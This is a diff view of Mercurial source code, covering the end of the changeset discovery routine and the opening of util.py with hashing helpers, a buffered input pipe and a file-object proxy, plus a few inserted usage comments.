372 # start actual discovery (we note this before the next "if" for
373 # compatibility reasons)
373 # compatibility reasons)
374 ui.status(_("searching for changes\n"))
374 ui.status(_("searching for changes\n"))
375
375
376 knownsrvheads = [] # revnos of remote heads that are known locally
376 knownsrvheads = [] # revnos of remote heads that are known locally
377 for node in srvheadhashes:
377 for node in srvheadhashes:
378 if node == nullid:
378 if node == nullid:
379 continue
379 continue
380
380
381 try:
381 try:
382 knownsrvheads.append(clrev(node))
382 knownsrvheads.append(clrev(node))
383 # Catches unknown and filtered nodes.
383 # Catches unknown and filtered nodes.
384 except error.LookupError:
384 except error.LookupError:
385 continue
385 continue
386
386
387 if len(knownsrvheads) == len(srvheadhashes):
387 if len(knownsrvheads) == len(srvheadhashes):
388 ui.debug("all remote heads known locally\n")
388 ui.debug("all remote heads known locally\n")
389 return srvheadhashes, False, srvheadhashes
389 return srvheadhashes, False, srvheadhashes
390
390
391 if len(sample) == len(ownheads) and all(yesno):
391 if len(sample) == len(ownheads) and all(yesno):
392 ui.note(_("all local heads known remotely\n"))
392 ui.note(_("all local heads known remotely\n"))
393 ownheadhashes = [clnode(r) for r in ownheads]
393 ownheadhashes = [clnode(r) for r in ownheads]
394 return ownheadhashes, True, srvheadhashes
394 return ownheadhashes, True, srvheadhashes
395
395
396 # full blown discovery
396 # full blown discovery
397
397
398 randomize = ui.configbool('devel', 'discovery.randomize')
398 randomize = ui.configbool('devel', 'discovery.randomize')
399 disco = partialdiscovery(local, ownheads, remote.limitedarguments,
399 disco = partialdiscovery(local, ownheads, remote.limitedarguments,
400 randomize=randomize)
400 randomize=randomize)
401 # treat remote heads (and maybe own heads) as a first implicit sample
401 # treat remote heads (and maybe own heads) as a first implicit sample
402 # response
402 # response
403 disco.addcommons(knownsrvheads)
403 disco.addcommons(knownsrvheads)
404 disco.addinfo(zip(sample, yesno))
404 disco.addinfo(zip(sample, yesno))
405
405
406 full = False
406 full = False
407 progress = ui.makeprogress(_('searching'), unit=_('queries'))
407 progress = ui.makeprogress(_('searching'), unit=_('queries'))
408 while not disco.iscomplete():
408 while not disco.iscomplete():
409
409
410 if full or disco.hasinfo():
410 if full or disco.hasinfo():
411 if full:
411 if full:
412 ui.note(_("sampling from both directions\n"))
412 ui.note(_("sampling from both directions\n"))
413 else:
413 else:
414 ui.debug("taking initial sample\n")
414 ui.debug("taking initial sample\n")
415 samplefunc = disco.takefullsample
415 samplefunc = disco.takefullsample
416 targetsize = fullsamplesize
416 targetsize = fullsamplesize
417 if not remote.limitedarguments:
417 if not remote.limitedarguments:
418 fullsamplesize = int(fullsamplesize * samplegrowth)
418 fullsamplesize = int(fullsamplesize * samplegrowth)
419 else:
419 else:
420 # use even cheaper initial sample
420 # use even cheaper initial sample
421 ui.debug("taking quick initial sample\n")
421 ui.debug("taking quick initial sample\n")
422 samplefunc = disco.takequicksample
422 samplefunc = disco.takequicksample
423 targetsize = initialsamplesize
423 targetsize = initialsamplesize
424 sample = samplefunc(ownheads, targetsize)
424 sample = samplefunc(ownheads, targetsize)
425
425
426 roundtrips += 1
426 roundtrips += 1
427 progress.update(roundtrips)
427 progress.update(roundtrips)
428 stats = disco.stats()
428 stats = disco.stats()
429 ui.debug("query %i; still undecided: %i, sample size is: %i\n"
429 ui.debug("query %i; still undecided: %i, sample size is: %i\n"
430 % (roundtrips, stats['undecided'], len(sample)))
430 % (roundtrips, stats['undecided'], len(sample)))
431
431
432 # indices between sample and externalized version must match
432 # indices between sample and externalized version must match
433 sample = list(sample)
433 sample = list(sample)
434
434
435 with remote.commandexecutor() as e:
435 with remote.commandexecutor() as e:
436 yesno = e.callcommand('known', {
436 yesno = e.callcommand('known', {
437 'nodes': [clnode(r) for r in sample],
437 'nodes': [clnode(r) for r in sample],
438 }).result()
438 }).result()
439
439
440 full = True
440 full = True
441
441
442 disco.addinfo(zip(sample, yesno))
442 disco.addinfo(zip(sample, yesno))
443
443
444 result = disco.commonheads()
444 result = disco.commonheads()
445 elapsed = util.timer() - start
445 elapsed = util.timer() - start
446 progress.complete()
446 progress.complete()
447 ui.debug("%d total queries in %.4fs\n" % (roundtrips, elapsed))
447 ui.debug("%d total queries in %.4fs\n" % (roundtrips, elapsed))
448 msg = ('found %d common and %d unknown server heads,'
448 msg = ('found %d common and %d unknown server heads,'
449 ' %d roundtrips in %.4fs\n')
449 ' %d roundtrips in %.4fs\n')
450 missing = set(result) - set(knownsrvheads)
450 missing = set(result) - set(knownsrvheads)
451 ui.log('discovery', msg, len(result), len(missing), roundtrips,
451 ui.log('discovery', msg, len(result), len(missing), roundtrips,
452 elapsed)
452 elapsed)
453
453
454 if not result and srvheadhashes != [nullid]:
454 if not result and srvheadhashes != [nullid]:
455 if abortwhenunrelated:
455 if abortwhenunrelated:
456 raise error.Abort(_("repository is unrelated"))
456 raise error.Abort(_("repository is unrelated"))
457 else:
457 else:
458 ui.warn(_("warning: repository is unrelated\n"))
458 ui.warn(_("warning: repository is unrelated\n"))
459 return ({nullid}, True, srvheadhashes,)
459 return ({nullid}, True, srvheadhashes,)
460
460
461 anyincoming = (srvheadhashes != [nullid])
461 anyincoming = (srvheadhashes != [nullid])
462 result = {clnode(r) for r in result}
462 result = {clnode(r) for r in result}
463 return result, anyincoming, srvheadhashes
463 return result, anyincoming, srvheadhashes
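# Schematic use (ui, local and remote as provided by the exchange machinery):
#
#     common, anyincoming, remoteheads = findcommonheads(ui, local, remote)
#     # `common`: set of node ids known to both sides
#     # `anyincoming`: True if the remote has changesets the local repo lacks
#     # `remoteheads`: the raw list of remote head hashes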
@@ -1,3326 +1,3326 b''
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import collections
19 import collections
20 import contextlib
20 import contextlib
21 import errno
21 import errno
22 import gc
22 import gc
23 import hashlib
23 import hashlib
24 import itertools
24 import itertools
25 import mmap
25 import mmap
26 import os
26 import os
27 import platform as pyplatform
27 import platform as pyplatform
28 import re as remod
28 import re as remod
29 import shutil
29 import shutil
30 import socket
30 import socket
31 import stat
31 import stat
32 import sys
32 import sys
33 import time
33 import time
34 import traceback
34 import traceback
35 import warnings
35 import warnings
36
36
37 from .thirdparty import (
37 from .thirdparty import (
38 attr,
38 attr,
39 )
39 )
40 from hgdemandimport import tracing
40 from hgdemandimport import tracing
41 from . import (
41 from . import (
42 encoding,
42 encoding,
43 error,
43 error,
44 i18n,
44 i18n,
45 node as nodemod,
45 node as nodemod,
46 policy,
46 policy,
47 pycompat,
47 pycompat,
48 urllibcompat,
48 urllibcompat,
49 )
49 )
50 from .utils import (
50 from .utils import (
51 compression,
51 compression,
52 procutil,
52 procutil,
53 stringutil,
53 stringutil,
54 )
54 )
55
55
56 rustdirs = policy.importrust('dirstate', 'Dirs')
56 rustdirs = policy.importrust(r'dirstate', r'Dirs')
57
57
58 base85 = policy.importmod(r'base85')
58 base85 = policy.importmod(r'base85')
59 osutil = policy.importmod(r'osutil')
59 osutil = policy.importmod(r'osutil')
60 parsers = policy.importmod(r'parsers')
60 parsers = policy.importmod(r'parsers')
61
61
62 b85decode = base85.b85decode
62 b85decode = base85.b85decode
63 b85encode = base85.b85encode
63 b85encode = base85.b85encode
64
64
65 cookielib = pycompat.cookielib
65 cookielib = pycompat.cookielib
66 httplib = pycompat.httplib
66 httplib = pycompat.httplib
67 pickle = pycompat.pickle
67 pickle = pycompat.pickle
68 safehasattr = pycompat.safehasattr
68 safehasattr = pycompat.safehasattr
69 socketserver = pycompat.socketserver
69 socketserver = pycompat.socketserver
70 bytesio = pycompat.bytesio
70 bytesio = pycompat.bytesio
71 # TODO deprecate stringio name, as it is a lie on Python 3.
71 # TODO deprecate stringio name, as it is a lie on Python 3.
72 stringio = bytesio
72 stringio = bytesio
73 xmlrpclib = pycompat.xmlrpclib
73 xmlrpclib = pycompat.xmlrpclib
74
74
75 httpserver = urllibcompat.httpserver
75 httpserver = urllibcompat.httpserver
76 urlerr = urllibcompat.urlerr
76 urlerr = urllibcompat.urlerr
77 urlreq = urllibcompat.urlreq
77 urlreq = urllibcompat.urlreq
78
78
79 # workaround for win32mbcs
79 # workaround for win32mbcs
80 _filenamebytestr = pycompat.bytestr
80 _filenamebytestr = pycompat.bytestr
81
81
82 if pycompat.iswindows:
82 if pycompat.iswindows:
83 from . import windows as platform
83 from . import windows as platform
84 else:
84 else:
85 from . import posix as platform
85 from . import posix as platform
86
86
87 _ = i18n._
87 _ = i18n._
88
88
89 bindunixsocket = platform.bindunixsocket
89 bindunixsocket = platform.bindunixsocket
90 cachestat = platform.cachestat
90 cachestat = platform.cachestat
91 checkexec = platform.checkexec
91 checkexec = platform.checkexec
92 checklink = platform.checklink
92 checklink = platform.checklink
93 copymode = platform.copymode
93 copymode = platform.copymode
94 expandglobs = platform.expandglobs
94 expandglobs = platform.expandglobs
95 getfsmountpoint = platform.getfsmountpoint
95 getfsmountpoint = platform.getfsmountpoint
96 getfstype = platform.getfstype
96 getfstype = platform.getfstype
97 groupmembers = platform.groupmembers
97 groupmembers = platform.groupmembers
98 groupname = platform.groupname
98 groupname = platform.groupname
99 isexec = platform.isexec
99 isexec = platform.isexec
100 isowner = platform.isowner
100 isowner = platform.isowner
101 listdir = osutil.listdir
101 listdir = osutil.listdir
102 localpath = platform.localpath
102 localpath = platform.localpath
103 lookupreg = platform.lookupreg
103 lookupreg = platform.lookupreg
104 makedir = platform.makedir
104 makedir = platform.makedir
105 nlinks = platform.nlinks
105 nlinks = platform.nlinks
106 normpath = platform.normpath
106 normpath = platform.normpath
107 normcase = platform.normcase
107 normcase = platform.normcase
108 normcasespec = platform.normcasespec
108 normcasespec = platform.normcasespec
109 normcasefallback = platform.normcasefallback
109 normcasefallback = platform.normcasefallback
110 openhardlinks = platform.openhardlinks
110 openhardlinks = platform.openhardlinks
111 oslink = platform.oslink
111 oslink = platform.oslink
112 parsepatchoutput = platform.parsepatchoutput
112 parsepatchoutput = platform.parsepatchoutput
113 pconvert = platform.pconvert
113 pconvert = platform.pconvert
114 poll = platform.poll
114 poll = platform.poll
115 posixfile = platform.posixfile
115 posixfile = platform.posixfile
116 readlink = platform.readlink
116 readlink = platform.readlink
117 rename = platform.rename
117 rename = platform.rename
118 removedirs = platform.removedirs
118 removedirs = platform.removedirs
119 samedevice = platform.samedevice
119 samedevice = platform.samedevice
120 samefile = platform.samefile
120 samefile = platform.samefile
121 samestat = platform.samestat
121 samestat = platform.samestat
122 setflags = platform.setflags
122 setflags = platform.setflags
123 split = platform.split
123 split = platform.split
124 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
124 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
125 statisexec = platform.statisexec
125 statisexec = platform.statisexec
126 statislink = platform.statislink
126 statislink = platform.statislink
127 umask = platform.umask
127 umask = platform.umask
128 unlink = platform.unlink
128 unlink = platform.unlink
129 username = platform.username
129 username = platform.username
130
130
131 # small compat layer
131 # small compat layer
132 compengines = compression.compengines
132 compengines = compression.compengines
133 SERVERROLE = compression.SERVERROLE
133 SERVERROLE = compression.SERVERROLE
134 CLIENTROLE = compression.CLIENTROLE
134 CLIENTROLE = compression.CLIENTROLE
135
135
136 try:
136 try:
137 recvfds = osutil.recvfds
137 recvfds = osutil.recvfds
138 except AttributeError:
138 except AttributeError:
139 pass
139 pass
140
140
141 # Python compatibility
141 # Python compatibility
142
142
143 _notset = object()
143 _notset = object()
144
144
145 def bitsfrom(container):
145 def bitsfrom(container):
146 bits = 0
146 bits = 0
147 for bit in container:
147 for bit in container:
148 bits |= bit
148 bits |= bit
149 return bits
149 return bits
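# For example, OR-ing permission bits (values here are illustrative):
#
#     bitsfrom([stat.S_IRUSR, stat.S_IWUSR]) == stat.S_IRUSR | stat.S_IWUSR
#     bitsfrom([1, 2, 4]) == 7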
150
150
151 # Python 2.6 still has deprecation warnings enabled by default. We do not
151 # Python 2.6 still has deprecation warnings enabled by default. We do not
152 # want to display anything to the standard user, so we detect if we are
152 # want to display anything to the standard user, so we detect if we are
153 # running tests and only use Python deprecation warnings in that case.
153 # running tests and only use Python deprecation warnings in that case.
154 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
154 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
155 if _dowarn:
155 if _dowarn:
156 # explicitly unfilter our warning for python 2.7
156 # explicitly unfilter our warning for python 2.7
157 #
157 #
158 # The option of setting PYTHONWARNINGS in the test runner was investigated.
158 # The option of setting PYTHONWARNINGS in the test runner was investigated.
159 # However, module name set through PYTHONWARNINGS was exactly matched, so
159 # However, module name set through PYTHONWARNINGS was exactly matched, so
160 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
160 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
161 # makes the whole PYTHONWARNINGS thing useless for our usecase.
161 # makes the whole PYTHONWARNINGS thing useless for our usecase.
162 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
162 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
163 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
163 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
164 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
164 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
165 if _dowarn and pycompat.ispy3:
165 if _dowarn and pycompat.ispy3:
166 # silence warning emitted by passing user string to re.sub()
166 # silence warning emitted by passing user string to re.sub()
167 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
167 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
168 r'mercurial')
168 r'mercurial')
169 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
169 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
170 DeprecationWarning, r'mercurial')
170 DeprecationWarning, r'mercurial')
171 # TODO: reinvent imp.is_frozen()
171 # TODO: reinvent imp.is_frozen()
172 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
172 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
173 DeprecationWarning, r'mercurial')
173 DeprecationWarning, r'mercurial')
174
174
175 def nouideprecwarn(msg, version, stacklevel=1):
175 def nouideprecwarn(msg, version, stacklevel=1):
176 """Issue an python native deprecation warning
176 """Issue an python native deprecation warning
177
177
178 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
178 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
179 """
179 """
180 if _dowarn:
180 if _dowarn:
181 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
181 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
182 " update your code.)") % version
182 " update your code.)") % version
183 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
183 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
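# Example call (only emits when HGEMITWARNINGS is set, i.e. under the test
# suite; the message and version strings are illustrative):
#
#     nouideprecwarn(b"use foo() instead", b"5.2", stacklevel=2)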
184
184
185 DIGESTS = {
185 DIGESTS = {
186 'md5': hashlib.md5,
186 'md5': hashlib.md5,
187 'sha1': hashlib.sha1,
187 'sha1': hashlib.sha1,
188 'sha512': hashlib.sha512,
188 'sha512': hashlib.sha512,
189 }
189 }
190 # List of digest types from strongest to weakest
190 # List of digest types from strongest to weakest
191 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
191 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
192
192
193 for k in DIGESTS_BY_STRENGTH:
193 for k in DIGESTS_BY_STRENGTH:
194 assert k in DIGESTS
194 assert k in DIGESTS
195
195
196 class digester(object):
196 class digester(object):
197 """helper to compute digests.
197 """helper to compute digests.
198
198
199 This helper can be used to compute one or more digests given their name.
199 This helper can be used to compute one or more digests given their name.
200
200
201 >>> d = digester([b'md5', b'sha1'])
201 >>> d = digester([b'md5', b'sha1'])
202 >>> d.update(b'foo')
202 >>> d.update(b'foo')
203 >>> [k for k in sorted(d)]
203 >>> [k for k in sorted(d)]
204 ['md5', 'sha1']
204 ['md5', 'sha1']
205 >>> d[b'md5']
205 >>> d[b'md5']
206 'acbd18db4cc2f85cedef654fccc4a4d8'
206 'acbd18db4cc2f85cedef654fccc4a4d8'
207 >>> d[b'sha1']
207 >>> d[b'sha1']
208 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
208 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
209 >>> digester.preferred([b'md5', b'sha1'])
209 >>> digester.preferred([b'md5', b'sha1'])
210 'sha1'
210 'sha1'
211 """
211 """
212
212
213 def __init__(self, digests, s=''):
213 def __init__(self, digests, s=''):
214 self._hashes = {}
214 self._hashes = {}
215 for k in digests:
215 for k in digests:
216 if k not in DIGESTS:
216 if k not in DIGESTS:
217 raise error.Abort(_('unknown digest type: %s') % k)
217 raise error.Abort(_('unknown digest type: %s') % k)
218 self._hashes[k] = DIGESTS[k]()
218 self._hashes[k] = DIGESTS[k]()
219 if s:
219 if s:
220 self.update(s)
220 self.update(s)
221
221
222 def update(self, data):
222 def update(self, data):
223 for h in self._hashes.values():
223 for h in self._hashes.values():
224 h.update(data)
224 h.update(data)
225
225
226 def __getitem__(self, key):
226 def __getitem__(self, key):
227 if key not in DIGESTS:
227 if key not in DIGESTS:
228 raise error.Abort(_('unknown digest type: %s') % key)
228 raise error.Abort(_('unknown digest type: %s') % key)
229 return nodemod.hex(self._hashes[key].digest())
229 return nodemod.hex(self._hashes[key].digest())
230
230
231 def __iter__(self):
231 def __iter__(self):
232 return iter(self._hashes)
232 return iter(self._hashes)
233
233
234 @staticmethod
234 @staticmethod
235 def preferred(supported):
235 def preferred(supported):
236 """returns the strongest digest type in both supported and DIGESTS."""
236 """returns the strongest digest type in both supported and DIGESTS."""
237
237
238 for k in DIGESTS_BY_STRENGTH:
238 for k in DIGESTS_BY_STRENGTH:
239 if k in supported:
239 if k in supported:
240 return k
240 return k
241 return None
241 return None
242
242
243 class digestchecker(object):
243 class digestchecker(object):
244 """file handle wrapper that additionally checks content against a given
244 """file handle wrapper that additionally checks content against a given
245 size and digests.
245 size and digests.
246
246
247 d = digestchecker(fh, size, {'md5': '...'})
247 d = digestchecker(fh, size, {'md5': '...'})
248
248
249 When multiple digests are given, all of them are validated.
249 When multiple digests are given, all of them are validated.
250 """
250 """
251
251
252 def __init__(self, fh, size, digests):
252 def __init__(self, fh, size, digests):
253 self._fh = fh
253 self._fh = fh
254 self._size = size
254 self._size = size
255 self._got = 0
255 self._got = 0
256 self._digests = dict(digests)
256 self._digests = dict(digests)
257 self._digester = digester(self._digests.keys())
257 self._digester = digester(self._digests.keys())
258
258
259 def read(self, length=-1):
259 def read(self, length=-1):
260 content = self._fh.read(length)
260 content = self._fh.read(length)
261 self._digester.update(content)
261 self._digester.update(content)
262 self._got += len(content)
262 self._got += len(content)
263 return content
263 return content
264
264
265 def validate(self):
265 def validate(self):
266 if self._size != self._got:
266 if self._size != self._got:
267 raise error.Abort(_('size mismatch: expected %d, got %d') %
267 raise error.Abort(_('size mismatch: expected %d, got %d') %
268 (self._size, self._got))
268 (self._size, self._got))
269 for k, v in self._digests.items():
269 for k, v in self._digests.items():
270 if v != self._digester[k]:
270 if v != self._digester[k]:
271 # i18n: first parameter is a digest name
271 # i18n: first parameter is a digest name
272 raise error.Abort(_('%s mismatch: expected %s, got %s') %
272 raise error.Abort(_('%s mismatch: expected %s, got %s') %
273 (k, v, self._digester[k]))
273 (k, v, self._digester[k]))
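# Sketch of intended use (size and digest values are illustrative): wrap a
# stream whose expected size and digest are known up front, drain it, then
# validate:
#
#     fh = digestchecker(fp, 1024, {'sha1': expectedhexdigest})
#     while fh.read(4096):
#         pass
#     fh.validate()  # raises error.Abort on size or digest mismatch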
274
274
275 try:
275 try:
276 buffer = buffer
276 buffer = buffer
277 except NameError:
277 except NameError:
278 def buffer(sliceable, offset=0, length=None):
278 def buffer(sliceable, offset=0, length=None):
279 if length is not None:
279 if length is not None:
280 return memoryview(sliceable)[offset:offset + length]
280 return memoryview(sliceable)[offset:offset + length]
281 return memoryview(sliceable)[offset:]
281 return memoryview(sliceable)[offset:]
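# On Python 3, where the buffer builtin is gone, this fallback returns a
# zero-copy memoryview slice, e.g. buffer(b'abcdef', 2, 3) compares equal
# to b'cde' without copying the underlying bytes.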
282
282
283 _chunksize = 4096
283 _chunksize = 4096
284
284
285 class bufferedinputpipe(object):
285 class bufferedinputpipe(object):
286 """a manually buffered input pipe
286 """a manually buffered input pipe
287
287
288 Python will not let us use buffered IO and lazy reading with 'polling' at
288 Python will not let us use buffered IO and lazy reading with 'polling' at
289 the same time. We cannot probe the buffer state and select will not detect
289 the same time. We cannot probe the buffer state and select will not detect
290 that data are ready to read if they are already buffered.
290 that data are ready to read if they are already buffered.
291
291
292 This class lets us work around that by implementing its own buffering
292 This class lets us work around that by implementing its own buffering
293 (allowing efficient readline) while offering a way to know if the buffer is
293 (allowing efficient readline) while offering a way to know if the buffer is
294 empty from the output (allowing collaboration of the buffer with polling).
294 empty from the output (allowing collaboration of the buffer with polling).
295
295
296 This class lives in the 'util' module because it makes use of the 'os'
296 This class lives in the 'util' module because it makes use of the 'os'
297 module from the python stdlib.
297 module from the python stdlib.
298 """
298 """
299 def __new__(cls, fh):
299 def __new__(cls, fh):
300 # If we receive a fileobjectproxy, we need to use a variation of this
300 # If we receive a fileobjectproxy, we need to use a variation of this
301 # class that notifies observers about activity.
301 # class that notifies observers about activity.
302 if isinstance(fh, fileobjectproxy):
302 if isinstance(fh, fileobjectproxy):
303 cls = observedbufferedinputpipe
303 cls = observedbufferedinputpipe
304
304
305 return super(bufferedinputpipe, cls).__new__(cls)
305 return super(bufferedinputpipe, cls).__new__(cls)
306
306
307 def __init__(self, input):
307 def __init__(self, input):
308 self._input = input
308 self._input = input
309 self._buffer = []
309 self._buffer = []
310 self._eof = False
310 self._eof = False
311 self._lenbuf = 0
311 self._lenbuf = 0
312
312
313 @property
313 @property
314 def hasbuffer(self):
314 def hasbuffer(self):
315 """True is any data is currently buffered
315 """True is any data is currently buffered
316
316
317 This will be used externally a pre-step for polling IO. If there is
317 This will be used externally a pre-step for polling IO. If there is
318 already data then no polling should be set in place."""
318 already data then no polling should be set in place."""
319 return bool(self._buffer)
319 return bool(self._buffer)
320
320
321 @property
321 @property
322 def closed(self):
322 def closed(self):
323 return self._input.closed
323 return self._input.closed
324
324
325 def fileno(self):
325 def fileno(self):
326 return self._input.fileno()
326 return self._input.fileno()
327
327
328 def close(self):
328 def close(self):
329 return self._input.close()
329 return self._input.close()
330
330
331 def read(self, size):
331 def read(self, size):
332 while (not self._eof) and (self._lenbuf < size):
332 while (not self._eof) and (self._lenbuf < size):
333 self._fillbuffer()
333 self._fillbuffer()
334 return self._frombuffer(size)
334 return self._frombuffer(size)
335
335
336 def unbufferedread(self, size):
336 def unbufferedread(self, size):
337 if not self._eof and self._lenbuf == 0:
337 if not self._eof and self._lenbuf == 0:
338 self._fillbuffer(max(size, _chunksize))
338 self._fillbuffer(max(size, _chunksize))
339 return self._frombuffer(min(self._lenbuf, size))
339 return self._frombuffer(min(self._lenbuf, size))
340
340
341 def readline(self, *args, **kwargs):
341 def readline(self, *args, **kwargs):
342 if len(self._buffer) > 1:
342 if len(self._buffer) > 1:
343 # this should not happen because both read and readline end with a
343 # this should not happen because both read and readline end with a
344 # _frombuffer call that collapses it.
344 # _frombuffer call that collapses it.
345 self._buffer = [''.join(self._buffer)]
345 self._buffer = [''.join(self._buffer)]
346 self._lenbuf = len(self._buffer[0])
346 self._lenbuf = len(self._buffer[0])
347 lfi = -1
347 lfi = -1
348 if self._buffer:
348 if self._buffer:
349 lfi = self._buffer[-1].find('\n')
349 lfi = self._buffer[-1].find('\n')
350 while (not self._eof) and lfi < 0:
350 while (not self._eof) and lfi < 0:
351 self._fillbuffer()
351 self._fillbuffer()
352 if self._buffer:
352 if self._buffer:
353 lfi = self._buffer[-1].find('\n')
353 lfi = self._buffer[-1].find('\n')
354 size = lfi + 1
354 size = lfi + 1
355 if lfi < 0: # end of file
355 if lfi < 0: # end of file
356 size = self._lenbuf
356 size = self._lenbuf
357 elif len(self._buffer) > 1:
357 elif len(self._buffer) > 1:
358 # we need to take previous chunks into account
358 # we need to take previous chunks into account
359 size += self._lenbuf - len(self._buffer[-1])
359 size += self._lenbuf - len(self._buffer[-1])
360 return self._frombuffer(size)
360 return self._frombuffer(size)
361
361
362 def _frombuffer(self, size):
362 def _frombuffer(self, size):
363 """return at most 'size' data from the buffer
363 """return at most 'size' data from the buffer
364
364
365 The data are removed from the buffer."""
365 The data are removed from the buffer."""
366 if size == 0 or not self._buffer:
366 if size == 0 or not self._buffer:
367 return ''
367 return ''
368 buf = self._buffer[0]
368 buf = self._buffer[0]
369 if len(self._buffer) > 1:
369 if len(self._buffer) > 1:
370 buf = ''.join(self._buffer)
370 buf = ''.join(self._buffer)
371
371
372 data = buf[:size]
372 data = buf[:size]
373 buf = buf[len(data):]
373 buf = buf[len(data):]
374 if buf:
374 if buf:
375 self._buffer = [buf]
375 self._buffer = [buf]
376 self._lenbuf = len(buf)
376 self._lenbuf = len(buf)
377 else:
377 else:
378 self._buffer = []
378 self._buffer = []
379 self._lenbuf = 0
379 self._lenbuf = 0
380 return data
380 return data
381
381
382 def _fillbuffer(self, size=_chunksize):
382 def _fillbuffer(self, size=_chunksize):
383 """read data to the buffer"""
383 """read data to the buffer"""
384 data = os.read(self._input.fileno(), size)
384 data = os.read(self._input.fileno(), size)
385 if not data:
385 if not data:
386 self._eof = True
386 self._eof = True
387 else:
387 else:
388 self._lenbuf += len(data)
388 self._lenbuf += len(data)
389 self._buffer.append(data)
389 self._buffer.append(data)
390
390
391 return data
391 return data
392
392
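# Typical pairing with polling (schematic; `proc` is an assumed subprocess
# handle): only poll the fd when the internal buffer is empty, otherwise
# drain the buffer first.
#
#     pipe = bufferedinputpipe(proc.stdout)
#     if not pipe.hasbuffer:
#         poll([pipe.fileno()])
#     line = pipe.readline()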
393 def mmapread(fp):
393 def mmapread(fp):
394 try:
394 try:
395 fd = getattr(fp, 'fileno', lambda: fp)()
395 fd = getattr(fp, 'fileno', lambda: fp)()
396 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
396 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
397 except ValueError:
397 except ValueError:
398 # Empty files cannot be mmapped, but mmapread should still work. Check
398 # Empty files cannot be mmapped, but mmapread should still work. Check
399 # if the file is empty, and if so, return an empty buffer.
399 # if the file is empty, and if so, return an empty buffer.
400 if os.fstat(fd).st_size == 0:
400 if os.fstat(fd).st_size == 0:
401 return ''
401 return ''
402 raise
402 raise
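# Example: map a file read-only; the returned mmap supports the buffer
# protocol, so slicing yields bytes without reading the whole file first:
#
#     with open(path, 'rb') as fp:
#         data = mmapread(fp)
#         chunk = data[offset:offset + length]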
403
403
404 class fileobjectproxy(object):
404 class fileobjectproxy(object):
405 """A proxy around file objects that tells a watcher when events occur.
405 """A proxy around file objects that tells a watcher when events occur.
406
406
407 This type is intended to only be used for testing purposes. Think hard
407 This type is intended to only be used for testing purposes. Think hard
408 before using it in important code.
408 before using it in important code.
409 """
409 """
410 __slots__ = (
410 __slots__ = (
411 r'_orig',
411 r'_orig',
412 r'_observer',
412 r'_observer',
413 )
413 )
414
414
415 def __init__(self, fh, observer):
415 def __init__(self, fh, observer):
416 object.__setattr__(self, r'_orig', fh)
416 object.__setattr__(self, r'_orig', fh)
417 object.__setattr__(self, r'_observer', observer)
417 object.__setattr__(self, r'_observer', observer)
418
418
419 def __getattribute__(self, name):
419 def __getattribute__(self, name):
420 ours = {
420 ours = {
421 r'_observer',
421 r'_observer',
422
422
423 # IOBase
423 # IOBase
424 r'close',
424 r'close',
425 # closed if a property
425 # closed if a property
426 r'fileno',
426 r'fileno',
427 r'flush',
427 r'flush',
428 r'isatty',
428 r'isatty',
429 r'readable',
429 r'readable',
430 r'readline',
430 r'readline',
431 r'readlines',
431 r'readlines',
432 r'seek',
432 r'seek',
433 r'seekable',
433 r'seekable',
434 r'tell',
434 r'tell',
435 r'truncate',
435 r'truncate',
436 r'writable',
436 r'writable',
437 r'writelines',
437 r'writelines',
438 # RawIOBase
438 # RawIOBase
439 r'read',
439 r'read',
440 r'readall',
440 r'readall',
441 r'readinto',
441 r'readinto',
442 r'write',
442 r'write',
443 # BufferedIOBase
443 # BufferedIOBase
444 # raw is a property
444 # raw is a property
445 r'detach',
445 r'detach',
446 # read defined above
446 # read defined above
447 r'read1',
447 r'read1',
448 # readinto defined above
448 # readinto defined above
449 # write defined above
449 # write defined above
450 }
450 }
451
451
452 # We only observe some methods.
452 # We only observe some methods.
453 if name in ours:
453 if name in ours:
454 return object.__getattribute__(self, name)
